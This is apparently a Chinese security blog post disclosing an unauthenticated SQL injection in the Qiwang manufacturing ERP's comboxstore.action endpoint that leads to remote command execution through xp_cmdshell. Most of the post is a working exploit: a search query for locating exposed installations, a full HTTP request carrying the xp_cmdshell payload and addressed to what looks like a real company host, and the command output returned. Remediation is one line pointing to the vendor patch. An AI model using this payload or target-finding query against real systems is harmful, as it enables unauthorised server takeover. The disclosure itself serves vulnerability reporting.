声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、企望制造ERP系统简介
企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。
二、漏洞描述
由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。
三、影响版本
企望制造ERP系统均可测试
四、资产搜索
title="企望制造ERP系统"
五、漏洞复现
Payload:http://127.0.0.1/mainFunctions/comboxstore.action
请求包
POST /mainFunctions/comboxstore.action HTTP /1.1
Host: erp.packcoltd.com:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
comboxsql=exec%20xp_cmdshell%20'ipconfig'
响应包
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 5100
Date: Wed, 20 Sep 2023 03:39:10 GMT
Connection: close
{'data':[{"Item":"","Value":"","Filter":"","NOListItemPersonalFilledAll":""}, {"Item":"Windows IP 配置","Value":"Windows IP 配置","Filter":"","NOListItemPersonalFilledAll":""}
截图如下
六、整改建议
目前厂商已发布升级补丁以修复漏洞:http://www.wantit.com.cn/